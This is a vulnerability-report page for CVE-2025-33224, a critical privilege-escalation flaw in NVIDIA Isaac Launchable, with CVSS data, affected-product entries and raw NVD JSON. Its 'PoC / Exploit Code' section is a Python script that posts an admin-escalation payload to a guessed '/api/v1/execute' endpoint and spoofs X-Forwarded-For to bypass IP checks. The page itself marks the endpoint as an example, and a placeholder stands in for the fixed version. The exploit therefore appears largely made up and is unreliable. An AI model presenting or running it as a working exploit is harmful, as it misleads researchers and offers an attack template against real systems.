Security Vulnerability Report
中文
CVE-2025-33224 CVSS 9.8 CRITICAL

CVE-2025-33224

Published: 2025-12-23 17:15:47
Last Modified: 2026-01-15 17:10:15

Description

NVIDIA Isaac Launchable contains a vulnerability where an attacker could cause an execution with unnecessary privileges. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure and data tampering.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nvidia:isaac_launchable:1.0:*:*:*:*:*:*:* - VULNERABLE
NVIDIA Isaac Launchable < 修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-33224 PoC - NVIDIA Isaac Launchable Privilege Escalation # Note: This PoC is for educational and security testing purposes only import requests import sys def exploit_cve_2025_33224(target_url): """ Exploit for CVE-2025-33224 - NVIDIA Isaac Launchable Privilege Escalation This vulnerability allows attackers to execute code with elevated privileges through improper permission validation in NVIDIA Isaac Launchable. """ print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting CVE-2025-33224...") # Target endpoint (may vary based on configuration) endpoint = f"{target_url}/api/v1/execute" # Example endpoint # Malicious payload to trigger privilege escalation payload = { "command": "whoami", # Test command to verify privilege "args": ["-a"], "execution_context": { "user_level": "admin", # Attempting to escalate privileges "session_id": "malicious_session" } } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-33224-PoC)", "X-Forwarded-For": "127.0.0.1" # Bypass IP checks if any } try: print("[*] Sending malicious request...") response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Potential successful exploitation detected!") print(f"[+] Response: {response.text}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-33224.py <target_url>") print("Example: python cve-2025-33224.py http://target.com:8080") sys.exit(1) target = sys.argv[1] exploit_cve_2025_33224(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33224", "sourceIdentifier": "[email protected]", "published": "2025-12-23T17:15:47.433", "lastModified": "2026-01-15T17:10:15.200", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NVIDIA Isaac Launchable contains a vulnerability where an attacker could cause an execution with unnecessary privileges. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure and data tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-250"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nvidia:isaac_launchable:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "06DCD93C-D16D-4B48-AACD-6E4A38FF5052"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33224", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5749", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-33224", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}